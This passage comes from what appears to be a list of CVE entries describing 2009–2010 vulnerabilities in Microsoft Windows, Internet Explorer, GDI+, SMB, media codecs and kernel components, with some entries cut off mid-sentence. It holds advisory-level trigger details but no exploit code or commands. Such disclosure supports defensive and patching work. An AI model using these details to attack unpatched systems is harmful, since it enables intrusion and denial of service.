execute arbitrary code, aka "Win32k Window Creation Vulnerability." [CVE-2010-0484] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 "do not properly validate changes in certain kernel objects," which allows local users to execute arbitrary code via vectors related to Device Contexts (DC) and the GetDCEx function, aka "Win32k Improper Data Validation Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0482] The kernel in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate relocation sections of image files, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Malformed Image Vulnerability." [CVE-2010-0481] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly translate a registry key's virtual path to its real path, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Virtual Path Parsing Vulnerability." [CVE-2010-0480] Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability." [CVE-2010-0478] Stack-based buffer overflow in nsum.exe in the Windows Media Unicast Service in Media Services for Microsoft Windows 2000 Server SP4 allows remote attackers to execute arbitrary code via crafted packets associated with transport information, aka "Media Services Stack-based Buffer Overflow Vulnerability." [CVE-2010-0477] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly handle (1) SMBv1 and (2) SMBv2 response packets, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted packet that causes the client to read the entirety of the response, and then improperly interact with the Winsock Kernel (WSK), aka "SMB Client Message Size Vulnerability." [CVE-2010-0476] The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability." [CVE-2010-0379] Multiple unspecified vulnerabilities in the Macromedia Flash ActiveX control in Adobe Flash Player 6, as distributed in Microsoft Windows XP SP2 and SP3, might allow remote attackers to execute arbitrary code via unspecified vectors that are not related to the use-after-free "Movie Unloading Vulnerability" (CVE-2010-0378). NOTE: due to lack of details, it is not clear whether this overlaps any other CVE item. [CVE-2010-0378] Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a "Movie Unloading Vulnerability." [CVE-2010-0278] A certain ActiveX control in msgsc.14.0.8089.726.dll in Microsoft Windows Live Messenger 2009 build 14.0.8089.726 on Windows Vista and Windows 7 allows remote attackers to cause a denial of service (msnmsgr.exe crash) by calling the ViewProfile method with a crafted argument during an MSN Messenger session. [CVE-2010-0270] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate fields in SMB transaction responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Transaction Vulnerability." [CVE-2010-0269] The SMB client in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for SMB responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Memory Allocation Vulnerability." [CVE-2010-0268] Unspecified vulnerability in the Windows Media Player ActiveX control in Windows Media Player (WMP) 9 on Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted media content, aka "Media Player Remote Code Execution Vulnerability." [CVE-2010-0265] Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka "Movie Maker and Producer Buffer Overflow Vulnerability." [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0250] Heap-based buffer overflow in DirectShow in Microsoft DirectX, as used in the AVI Filter on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2, and in Quartz on Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, allows remote attackers to execute arbitrary code via an AVI file with a crafted length field in an unspecified video stream, which is not properly handled by the RLE video decompressor, aka "DirectShow Heap Overflow Vulnerability." [CVE-2010-0249] Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4 [CVE-2010-0242] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to cause a denial of service (system hang) via crafted packets with malformed TCP selective acknowledgement (SACK) values, aka "TCP/IP Selective Acknowledgement Vulnerability." [CVE-2010-0241] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Route Information packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Route Information Vulnerability." [CVE-2010-0240] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when a custom network driver is used, does not properly handle local fragmentation of Encapsulating Security Payload (ESP) over UDP packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "Header MDL Fragmentation Vulnerability." [CVE-2010-0239] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability." [CVE-2010-0238] Unspecified vulnerability in registry-key validation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Registry Key Vulnerability." [CVE-2010-0237] The kernel in Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows local users to gain privileges by creating a symbolic link from an untrusted registry hive to a trusted registry hive, aka "Windows Kernel Symbolic Link Creation Vulnerability." [CVE-2010-0236] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not properly allocate memory for the destination key associated with a symbolic-link registry key, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Allocation Vulnerability." [CVE-2010-0235] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not perform the expected validation before creating a symbolic link, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Symbolic Link Value Vulnerability." [CVE-2010-0234] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate a registry-key argument to an unspecified system call, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Null Pointer Vulnerability." [CVE-2010-0233] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-0232] The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0231] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not use a sufficient source of entropy, which allows remote attackers to obtain access to files and other SMB resources via a large number of authentication requests, related to server-generated challenges, certain "duplicate values," and spoofing of an authentication token, aka "SMB NTLM Authentication Lack of Entropy Vulnerability." [CVE-2010-0035] The Key Distribution Center (KDC) in Kerberos in Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2, when a trust relationship with a non-Windows Kerberos realm exists, allows remote authenticated users to cause a denial of service (NULL pointer dereference and domain controller outage) via a crafted Ticket Granting Ticket (TGT) renewal request, aka "Kerberos Null Pointer Dereference Vulnerability." [CVE-2010-0028] Integer overflow in Microsoft Paint in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted JPEG (.JPG) file, aka "MS Paint Integer Overflow Vulnerability." [CVE-2010-0027] The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability." [CVE-2010-0026] The Hyper-V server implementation in Microsoft Windows Server 2008 Gold, SP2, and R2 on the x64 platform allows guest OS users to cause a denial of service (host OS hang) via a crafted application that executes a malformed series of machine instructions, aka "Hyper-V Instruction Set Validation Vulnerability." [CVE-2010-0025] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2000 SP3, does not properly allocate memory for SMTP command replies, which allows remote attackers to read fragments of e-mail messages by sending a series of invalid commands and then sending a STARTTLS command, aka "SMTP Memory Allocation Vulnerability." [CVE-2010-0024] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2003 SP2, does not properly parse MX records, which allows remote DNS servers to cause a denial of service (service outage) via a crafted response to a DNS MX record query, aka "SMTP Server MX Record Vulnerability." [CVE-2010-0023] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2010-0022] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate the share and servername fields in SMB packets, which allows remote attackers to cause a denial of service (system hang) via a crafted packet, aka "SMB Null Pointer Vulnerability." [CVE-2010-0021] Multiple race conditions in the SMB implementation in the Server service in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allow remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 Negotiate packet, aka "SMB Memory Corruption Vulnerability." [CVE-2010-0020] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate request fields, which allows remote authenticated users to execute arbitrary code via a malformed request, aka "SMB Pathname Overflow Vulnerability." [CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability." [CVE-2010-0018] Integer overflow in the Embedded OpenType (EOT) Font Engine (t2embed.dll) in Microsoft Windows 2000 SP4 [CVE-2010-0017] Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka "SMB Client Race Condition Vulnerability." [CVE-2010-0016] The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted response, aka "SMB Client Pool Corruption Vulnerability." [CVE-2009-4313] ir32_32.dll 3.24.15.3 in the Indeo32 codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (heap corruption) or execute arbitrary code via malformed data in a stream in a media file, as demonstrated by an AVI file. [CVE-2009-4312] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Dave Lenoe of Adobe. [CVE-2009-4311] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Paul Byrne of NGS Software. NOTE: this might overlap CVE-2008-3615. [CVE-2009-4310] Stack-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted compressed video data in an IV41 stream in a media file, leading to many loop iterations, as demonstrated by data in an AVI file. [CVE-2009-4309] Heap-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a large size value in a movi record in an IV41 stream in a media file, as demonstrated by an AVI file. [CVE-2009-4210] The Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted media content. [CVE-2009-3678] Integer overflow in cdd.dll in the Canonical Display Driver (CDD) in Microsoft Windows Server 2008 R2 and Windows 7 on 64-bit platforms, when the Windows Aero theme is installed, allows context-dependent attackers to cause a denial of service (reboot) or possibly execute arbitrary code via a crafted image file that triggers incorrect data parsing after user-mode data is copied to kernel mode, as demonstrated using "Browse with Irfanview" and certain actions on a folder containing a large number of thumbnail images in Resample mode, possibly related to the ATI graphics driver or win32k.sys, aka "Canonical Display Driver Integer Overflow Vulnerability." [CVE-2009-3677] The Internet Authentication Service (IAS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly verify the credentials in an MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication request, which allows remote attackers to access network resources via a malformed request, aka "MS-CHAP Authentication Bypass Vulnerability." [CVE-2009-3676] The SMB client in the kernel in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to cause a denial of service (infinite loop and system hang) via a (1) SMBv1 or (2) SMBv2 response packet that contains (a) an incorrect length value in a NetBIOS header or (b) an additional length field at the end of this response packet, aka "SMB Client Incomplete Response Vulnerability." [CVE-2009-3675] LSASS.exe in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote authenticated users to cause a denial of service (CPU consumption) via a malformed ISAKMP request over IPsec, aka "Local Security Authority Subsystem Service Resource Exhaustion Vulnerability." [CVE-2009-3294] The popen API function in TSRM/tsrm_win32.c in PHP before 5.2.11 and 5.3.x before 5.3.1, when running on certain Windows operating systems, allows context-dependent attackers to cause a denial of service (crash) via a crafted (1) "e" or (2) "er" string in the second argument (aka mode), possibly related to the _fdopen function in the Microsoft C runtime library. NOTE: this might not cross privilege boundaries except in rare cases in which the mode argument is accessible to an attacker outside of an application that uses the popen function. [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3103] Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3020] win32k.sys in Microsoft Windows Server 2003 SP2 allows remote attackers to cause a denial of service (system crash) by referencing a crafted .eot file in the src descriptor of an @font-face Cascading Style Sheets (CSS) rule in an HTML document, possibly related to the Embedded OpenType (EOT) Font Engine, a different vulnerability than CVE-2006-0010, CVE-2009-0231, and CVE-2009-0232. NOTE: some of these details are obtained from third party information. [CVE-2009-3019] Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute. [CVE-2009-2764] Microsoft Internet Explorer 8.0.7100.0 on Windows 7 RC on the x64 platform allows remote attackers to cause a denial of service (application crash) via a certain DIV element in conjunction with SCRIPT elements that have empty contents and no reference to a valid external script location. [CVE-2009-2655] mshtml.dll in Microsoft Internet Explorer 7 and 8 on Windows XP SP3 allows remote attackers to cause a denial of service (application crash) by calling the JavaScript findText method with a crafted Unicode string in the first argument, and only one additional argument, as demonstrated by a second argument of -1. [CVE-2009-2653] DISPUTED The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.' [CVE-2009-2544] Directory traversal vulnerability in the Marcelo Costa FileServer component 1.0 for Microsoft Windows Live Messenger and Messenger Plus! Live (MPL) allows remote authenticated users to list arbitrary directories and read arbitrary files via a .. (dot dot) in a pathname. [CVE-2009-2532] Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability." [CVE-2009-2527] Heap-based buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via (1) a crafted ASF file or (2) crafted streaming content, aka "WMP Heap Overflow Vulnerability." [CVE-2009-2526] Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability." [CVE-2009-2525] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly initialize unspecified functions within compressed audio files, which allows remote attackers to execute arbitrary code via (1) a crafted media file or (2) crafted streaming content, aka "Windows Media Runtime Heap Corruption Vulnerability." [CVE-2009-2524] Integer underflow in the NTLM authentication feature in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (reboot) via a malformed packet, aka "Local Security Authority Subsystem Service Integer Overflow Vulnerability." [CVE-2009-2523] The License Logging Server (llssrv.exe) in Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via an RPC message containing a string without a null terminator, which triggers a heap-based buffer overflow in the LlsrLicenseRequestW method, aka "License Logging Server Heap Overflow Vulnerability." [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2517] The kernel in Microsoft Windows Server 2003 SP2 does not properly handle unspecified exceptions when an error condition occurs, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2009-2516] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly validate data sent from user mode, which allows local users to gain privileges via a crafted PE .exe file that triggers a NULL pointer dereference during chain traversal, aka "Windows Kernel NULL Pointer Dereference Vulnerability." [CVE-2009-2515] Integer underflow in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application that triggers an incorrect truncation of a 64-bit integer to a 32-bit integer, aka "Windows Kernel Integer Underflow Vulnerability." [CVE-2009-2514] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not correctly parse font code during construction of a directory-entry table, which allows remote attackers to execute arbitrary code via a crafted Embedded OpenType (EOT) font, aka "Win32k EOT Parsing Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2511] Integer overflow in the CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows man-in-the-middle attackers to spoof arbitrary SSL servers and other entities via an X.509 certificate that has a malformed ASN.1 Object Identifier (OID) and was issued by a legitimate Certification Authority, aka "Integer Overflow in X.509 Object Identifiers Vulnerability." [CVE-2009-2510] The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408. [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2507] A certain ActiveX control in the Indexing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly process URLs, which allows remote attackers to execute arbitrary programs via unspecified vectors that cause a "vulnerable binary" to load and run, aka "Memory Corruption in Indexing Service Vulnerability." [CVE-2009-2505] The Internet Authentication Service (IAS) in Microsoft Windows Vista SP2 and Server 2008 SP2 does not properly validate MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication requests, which allows remote attackers to execute arbitrary code via crafted structures in a malformed request, aka "Internet Authentication Service Memory Corruption Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows 